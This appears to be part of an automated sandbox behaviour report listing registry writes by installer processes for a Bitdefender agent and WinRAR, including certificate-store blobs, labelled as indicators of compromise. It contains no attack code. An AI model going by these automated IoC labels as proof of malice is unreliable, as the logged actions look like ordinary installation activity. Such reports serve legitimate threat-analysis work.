\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WatchDog.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates ProductAgentUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DiscoverySrv.exe -
Modifies registry class 64 IoCs
Processes:
regsvr32.exeuninstall.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ProgID\ = "ProductAgent.UPNPDevice.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r00 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r03 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r09 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r10\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r14\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ = "UPNPDevice Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bz2\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r26 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.z uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.001 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tzst\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ProductAgent.UPNPDevice\CurVer regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\TypeLib\ = "{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}\1.0\0\win32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lz uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r08\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\InprocServer32\ = "C:\\Program Files\\Bitdefender Agent\\26.0.1.231\\DiscoveryComp.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew\FileName = "C:\\Program Files\\WinRAR\\rarnew.dat" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\Programmable regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r02 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.uue uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r07 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.z\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,0" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}\1.0 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r12 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.arj uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ProductAgent.UPNPDevice regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r02\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR" uninstall.exe -
Modifies registry key 1 TTPs 6 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exepid process 436 reg.exe 3304 reg.exe 2084 reg.exe 2164 reg.exe 1000 reg.exe 2608 reg.exe -
Processes:
DiscoverySrv.exeinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e DiscoverySrv.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B installer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 DiscoverySrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3